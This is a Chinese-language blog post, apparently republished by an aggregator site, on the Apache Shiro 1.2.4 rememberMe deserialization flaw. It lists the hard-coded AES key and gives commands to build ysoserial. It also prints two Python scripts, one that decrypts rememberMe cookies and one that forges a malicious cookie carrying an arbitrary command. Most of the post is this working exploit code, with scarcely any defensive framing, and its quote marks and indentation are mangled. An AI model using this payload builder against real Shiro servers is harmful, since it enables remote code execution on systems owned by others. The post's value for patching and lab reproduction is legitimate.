Apache Shiro 反序列化RCE漏洞
Posted 挖洞的土拨鼠
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Apache Shiro 反序列化RCE漏洞相关的知识,希望对你有一定的参考价值。
漏洞介绍
- 漏洞类型 :JAVA反序列化(RCE)
- 影响版本 :Apache Shiro 1.2.4及其之前版本
- 漏洞评级 :高危
漏洞分析 #:
下载漏洞环境:
git clone https://github.com/apache/shiro.git
git checkout shiro-root-1.2.4
工具下载
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -DskipTests
cp target/ysoserial-0.0.5-SNAPSHOT-all.jar /tmp
该漏洞在传输中使用了AES CBC加密和Base64编码,CookieRememberMemanager.java类中的父类AbstractRememberMeManager中有硬编码秘钥:Base64.decode("kPH+bIxk5D2deZiIxcaaaA==") ,python的解密代码:
# pip install pycrypto
import sys
import base64
from Crypto.Cipher import AES
def decode_rememberme_file(filename):
with open(filename, ‘rb‘) as fpr:
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
IV = b‘ ‘ * 16
encryptor = AES.new(base64.b64decode(key), mode, IV=IV)
remember_bin = encryptor.decrypt(fpr.read())
return remember_bin
if __name__ == ‘__main__‘:
with open("/tmp/decrypt.bin", ‘wb+‘) as fpw:
fpw.write(decode_rememberme_file(sys.argv[1]))
漏洞序列化的对象是 PrincipalCollection,利用脚本
# pip install pycrypto
import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen([‘java‘, ‘-jar‘, ‘ysoserial-0.0.5-SNAPSHOT-all.jar‘, ‘CommonsCollections2‘, command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == ‘__main__‘:
payload = encode_rememberme(sys.argv[1])
with open("/tmp/payload.cookie", "w") as fpw:
print("rememberMe={}".format(payload.decode()), file=fpw)
以上是关于Apache Shiro 反序列化RCE漏洞的主要内容,如果未能解决你的问题,请参考以下文章
Apache Shiro 1.2.4反序列化漏洞(CVE-2016-4437)复现
漏洞实战Apache Shiro反序列化远程代码执行复现及“批量杀鸡”
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现